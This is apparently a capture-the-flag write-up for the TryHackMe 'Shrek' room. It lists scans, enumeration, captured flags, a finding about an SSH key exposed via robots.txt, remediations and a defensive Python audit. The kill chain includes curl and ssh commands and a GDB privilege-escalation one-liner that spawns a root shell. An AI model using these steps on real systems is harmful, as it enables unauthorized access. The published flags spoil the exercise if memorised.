Write up

Name

TryHackMe | Shrek

Writer

0x64azana

Genre

Enumeration, Exploitation, Priv-Esc

OS

CentOS 3.10.0-862.el7.x86_64

IP

10.10.148.27

HOSTNAME

shrek

BASIC-INFO

1 Hour to find as many flags as you can!

USERS / EMAILS


shrek

CREDENTIALS


??shrek is a winner?? ## See 9. 10. 11.
shrek : id_rsa


==============================================================================

NMAP-RESULTS


init_
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8009/tcp open ajp13
8080/tcp open http-proxy
9999/tcp open abyss

nmap_
Discovered open port 80/tcp on 10.10.148.27 Apache/2.4.6 (CentOS) PHP/7.1.33
Discovered open port 3306/tcp on 10.10.148.27
Discovered open port 22/tcp on 10.10.148.27 OpenSSH 7.4 (protocol 2.0)
Discovered open port 21/tcp on 10.10.148.27 vsftpd 3.0.2
Discovered open port 8080/tcp on 10.10.148.27 Apache Tomcat/7.0.88
Discovered open port 9999/tcp on 10.10.148.27
Discovered open port 65432/tcp on 10.10.148.27 False find
Discovered open port 8009/tcp on 10.10.148.27 Protocol v1.3


==============================================================================

TO-TRY


1. FTP ANON -- Failed
2. Enum 80 (HTTP)
3. Enum 8080 and 9999 (HTTP)
4. Review NMAP output -> 5.
5. See /Cpxtpt2hWCee9VFa.txt -- SUCCESSFUL -> 6.
6. Find the user the id_rsa belongs to. -- 12.
7. Inspect gobuster output for port 80 -> 6.
8. Brute Force http://10.10.148.27:8080/manager/html
9. Base64 decode string found in port 80:/ comments -> 10.
10. Find and decode the second layer of (9.) -> 11.
11. Test the output as a password -- FAILED
12. Test id_rsa on shrek -- SUCCESSFUL -> 13.
13. Enum Internals -> 14.
14. Enum flags in the system -> 15.
15. Find common privesc methods -- SUCCESSFUL -> 16.
16. Enum all flags as root -- SUCCESSFUL

CVE-LIST

N/A

==============================================================================

WEB-TECHS


- PHP
- Apache Tomcat

SUBDIR-ENUMS

N/A

DIR-ENUMERATIONS


80_
/api (Status: 301) [Size: 232] [--> http://10.10.148.27/api/]
/cgi-bin/ (Status: 403) [Size: 210]
/cms (Status: 301) [Size: 232] [--> http://10.10.148.27/cms/]
/robots.txt (Status: 200) [Size: 46]
/upload (Status: 301) [Size: 235] [--> http://10.10.148.27/upload/]
8080_
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
/plain] (Status: 400) [Size: 0]
/quote] (Status: 400) [Size: 0]


==============================================================================

TAKE-AWAYS


1. This is a Docker container, as shown by running `ip route`

Flags_
shrek
0069ba233da89efe6f48e7d214034130

Donkey
974acecd51cc45c843062fdac6235e97

Puss
6f960e8f2ea8e3de92f192fae492ec59

root
8cc6ece048e6c42251c411814ff5a22d

etc
456ca96a9ba8a9f527089ddde0efc92d

==============================================================================

Issues


/robots.txt exposes the path to an SSH private key for the `shrek` user

Severity


Critical

Compliance Gap


Public exposure of sensitive credentials (CIS, NIST, PCI DSS)

Impact


Attacker can log in via SSH as `shrek`, gaining a foothold and possibly escalating privileges.

Kill Chain


1.
# Fetch robots.txt; it lists the path of the file holding the key
curl http://10.10.148.27/robots.txt

2.
# Save the exposed key as id_rsa and restrict its permissions so ssh will accept it
curl http://10.10.148.27/Cpxtpt2hWCee9VFa.txt > id_rsa && chmod 600 ./id_rsa

3.
# Log in as the shrek user with the recovered id_rsa file
ssh shrek@10.10.148.27 -i id_rsa

4.
# Priv Esc: spawn a shell from gdb that keeps the elevated effective privileges (-p)
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

Remediations


- Remove the exposed key file from the web root and the /robots.txt entry pointing to it
- Rotate the `shrek` SSH key
- Harden web root and file permissions
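The issue above is easy to catch before an attacker does: every path a robots.txt advertises is worth fetching and checking for private-key material. The audit below is an added example written for this write-up, not a tool from the room or its author; the sample robots.txt and the key body it inspects are constructed placeholders, and `fetch` is a hypothetical callable you supply (a dict lookup offline, an HTTP client against your own web root).

```python
import re
from typing import Callable, List, Optional

# Constructed sample inputs (not captured from the target): a robots.txt that
# points at an oddly named file, and the bodies served at the listed paths.
# The key body is a placeholder, not a real key.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /Cpxtpt2hWCee9VFa.txt
Disallow: /cms/
Disallow: /
"""
SAMPLE_BODIES = {
    "/Cpxtpt2hWCee9VFa.txt": "-----BEGIN RSA PRIVATE KEY-----\n"
                             "PLACEHOLDER-NOT-A-REAL-KEY\n"
                             "-----END RSA PRIVATE KEY-----\n",
    "/cms/": "<html><body>cms index</body></html>",
}

# PEM headers used by SSH/TLS private keys (RSA, EC, DSA, OpenSSH, PKCS#8).
PRIVATE_KEY_RE = re.compile(
    r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")


def robots_paths(text: str) -> List[str]:
    """Paths named in Allow/Disallow rules, in order; comments, empty
    values and the catch-all '/' rule are ignored."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop robots.txt comments
        key, _, value = line.partition(":")
        if key.strip().lower() in ("allow", "disallow"):
            value = value.strip()
            if value and value != "/":
                paths.append(value)
    return paths


def looks_like_private_key(body: str) -> bool:
    """True if the body carries a PEM private-key header."""
    return PRIVATE_KEY_RE.search(body) is not None


def audit(robots_text: str, fetch: Callable[[str], Optional[str]]) -> List[str]:
    """Fetch every path robots.txt advertises and report those whose body is
    a private key. `fetch` maps a path to its body (None if unreachable), so
    the same logic runs offline against a dict or online with an HTTP client."""
    findings = []
    for path in robots_paths(robots_text):
        body = fetch(path)
        if body is not None and looks_like_private_key(body):
            findings.append(path)
    return findings
```

Run offline with `audit(SAMPLE_ROBOTS, SAMPLE_BODIES.get)`; the same check belongs in a pre-deploy scan of the web root, where any hit is a key that must be removed and rotated.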